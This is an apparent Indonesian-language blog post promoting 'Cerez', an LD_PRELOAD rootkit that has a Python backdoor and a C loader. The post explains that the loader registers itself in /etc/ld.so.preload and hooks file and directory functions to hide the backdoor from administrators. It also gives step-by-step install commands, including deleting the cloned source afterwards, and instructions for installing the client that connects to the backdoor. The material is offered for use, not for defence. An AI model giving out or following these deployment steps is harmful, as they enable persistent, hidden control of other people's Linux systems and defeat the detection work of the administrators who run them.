Rootkit LD_PRELOAD Sederhana : CEREZ

Cerez

Cerez adalah rootkit LD_PRELOAD, terdiri dari dua bagian, backdoor (ditulis dengan python) dan loader (ditulis dalam c). Loader adalah biner SO yang diinstal /lib dan menulis jalurnya ke /etc/ld.so.preload, dengan cara ini setiap biner pada sistem memuatnya terlebih dahulu. Dengan menimpa fungsi sistem seperti fopen, readdir, access dan unlinkat hampir tidak mungkin untuk menghapus/mendeteksi backdoor. Cerez juga memiliki klien sederhana yang dapat digunakan untuk menghubungkan backdoor.

Fitur

Rootkit

Sebelum membahas instalasi rootkit mari kita bahas tentang rootkit. Rootkit adalah beberapa perangkat lunak yang dapat bekerja secara mandiri atau kooperatif dengan beberapa kode berbahaya lainnya untuk menyembunyikan keberadaannya serta aktivitas berbahaya apa pun. Biasanya dimaksudkan untuk menyembunyikan keberadaan file, direktori, login, proses, koneksi jarak jauh, dan aktivitas jahat apa pun yang dimaksudkan oleh muatannya. 

Bagaimana biasanya pengguna biasa atau administrator sistem mencari suatu proses (sah atau berbahaya) pada suatu sistem — dengan menjalankan beberapa program seperti pengelola tugas atau mungkin ps (di Linux). Secara internal, program-program ini memanfaatkan fungsi perpustakaan bersama yang selanjutnya melakukan panggilan sistem (layanan yang ditawarkan oleh sistem operasi) untuk melakukan suatu tugas. Ya, rootkit bermaksud membuat program ini berbohong kepada audiensnya (administrator sistem atau mungkin pengguna biasa). 

CATATAN : Instalasi server dan klien hanya dapat berjalan di sistem operasi Linux.

Install Rootkit

git clone https://github.com/ngn13/cerez.git
cd cerez
chmod +x install.sh
# sebelum menginstal, buka backdoor.py
# dan rubah backdoor password
./install.sh
cd ..
rm -rf cerez 

Install Klien

git clone https://github.com/ngn13/cerez.git
cd cerez
chmod +x client.py
./client.py 

Baik, cukup sekian pembahasan tentang backdoor CEREZ, semoga bermanfaat.